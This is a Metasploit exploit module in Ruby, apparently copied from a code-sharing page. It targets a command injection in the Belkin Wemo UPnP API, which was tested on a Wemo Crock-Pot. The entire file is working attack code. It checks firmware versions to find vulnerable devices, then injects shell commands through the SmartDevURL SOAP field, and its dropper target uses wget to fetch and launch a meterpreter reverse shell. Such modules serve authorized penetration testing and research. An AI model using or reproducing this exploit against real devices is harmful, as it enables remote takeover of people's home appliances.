Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7

8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Exploit::CmdStager
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'               => 'Belkin Wemo UPnP Remote Code Execution',
17
      'Description'        => %q{
18
        This module exploits a command injection in the Belkin Wemo UPnP API via
19
        the SmartDevURL argument to the SetSmartDevInfo action.
20

21
        This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
22
        devices are known to be affected, albeit on a different RPORT (49153).
23
      },
24
      'Author'             => [
25
        'phikshun', # Discovery, UFuzz, and modules
26
        'wvu',      # Crock-Pot testing and module
27
        'nstarke'   # Version-checking research and implementation
28
      ],
29
      'References'         => [
30
        ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
31
        ['URL', 'https://github.com/phikshun/ufuzz'],
32
        ['URL', 'https://gist.github.com/phikshun/10900566'],
33
        ['URL', 'https://gist.github.com/phikshun/9984624'],
34
        ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
35
        ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
36
        ['URL', 'http://www.wemo.com/']
37
      ],
38
      'DisclosureDate'     => '2014-04-04',
39
      'License'            => MSF_LICENSE,
40
      'Platform'           => ['unix', 'linux'],
41
      'Arch'               => [ARCH_CMD, ARCH_MIPSLE],
42
      'Privileged'         => true,
43
      'Targets'            => [
44
        ['Unix In-Memory',
45
          'Platform'       => 'unix',
46
          'Arch'           => ARCH_CMD,
47
          'Type'           => :unix_memory,
48
          'DefaultOptions' => {
49
            'PAYLOAD'      => 'cmd/unix/generic'
50
          }
51
        ],
52
        ['Linux Dropper',
53
          'Platform'       => 'linux',
54
          'Arch'           => ARCH_MIPSLE,
55
          'Type'           => :linux_dropper,
56
          'DefaultOptions' => {
57
            'PAYLOAD'      => 'linux/mipsle/meterpreter_reverse_tcp'
58
          }
59
        ]
60
      ],
61
      'DefaultTarget'      => 1,
62
      'Notes'              => {
63
        'NOCVE'            => ['Patched in 2.00.8643 without vendor disclosure'],
64
        'Stability'        => [CRASH_SAFE],
65
        'SideEffects'      => [ARTIFACTS_ON_DISK],
66
        'Reliability'      => [REPEATABLE_SESSION]
67
      }
68
    ))
69

70
    register_options([
71
      Opt::RPORT(49152)
72
    ])
73

74
    register_advanced_options([
75
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
76
    ])
77
  end
78

79
  def check
80
    checkcode = CheckCode::Unknown
81

82
    res = send_request_cgi(
83
      'method' => 'GET',
84
      'uri'    => '/setup.xml'
85
    )
86

87
    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
88
      vprint_error('Wemo-enabled device not detected')
89
      return checkcode
90
    end
91

92
    vprint_good('Wemo-enabled device detected')
93
    checkcode = CheckCode::Detected
94

95
    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
96
              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Rex::Version.new($1)
97

98
    unless version
99
      vprint_error('Could not determine firmware version')
100
      return checkcode
101
    end
102

103
    vprint_status("Found firmware version: #{version}")
104

105
    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
106
    if version < Rex::Version.new('2.00.8643')
107
      vprint_good("Firmware version #{version} < 2.00.8643")
108
      checkcode = CheckCode::Appears
109
    else
110
      vprint_error("Firmware version #{version} >= 2.00.8643")
111
      checkcode = CheckCode::Safe
112
    end
113

114
    checkcode
115
  end
116

117
  def exploit
118
    case target['Type']
119
    when :unix_memory
120
      execute_command(payload.encoded)
121
    when :linux_dropper
122
      cmdstager = generate_cmdstager(
123
        flavor:   :wget,
124
        temp:     datastore['WritableDir'],
125
        file:     File.basename(cmdstager_path),
126
        noconcat: true
127
      )
128

129
      # HACK: "chmod +x"
130
      cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
131
      cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
132
      cmdstager = cmdstager.join(';')
133

134
      vprint_status("Regenerated command stager: #{cmdstager}")
135
      execute_command(cmdstager)
136
    end
137
  end
138

139
  def execute_command(cmd, opts = {})
140
    send_request_cgi(
141
      'method'       => 'POST',
142
      'uri'          => '/upnp/control/basicevent1',
143
      'ctype'        => 'text/xml',
144
      'headers'      => {
145
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
146
      },
147
      'data'         => generate_soap_xml(cmd)
148
    )
149
  end
150

151
  def generate_soap_xml(cmd)
152
    <<~EOF
153
      <?xml version="1.0" encoding="utf-8"?>
154
      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
155
        <s:Body>
156
          <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
157
            <SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
158
          </u:SetSmartDevInfo>
159
        </s:Body>
160
      </s:Envelope>
161
    EOF
162
  end
163

164
  def cmdstager_path
165
    @cmdstager_path ||=
166
      "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
167
  end
168

169
end
170

171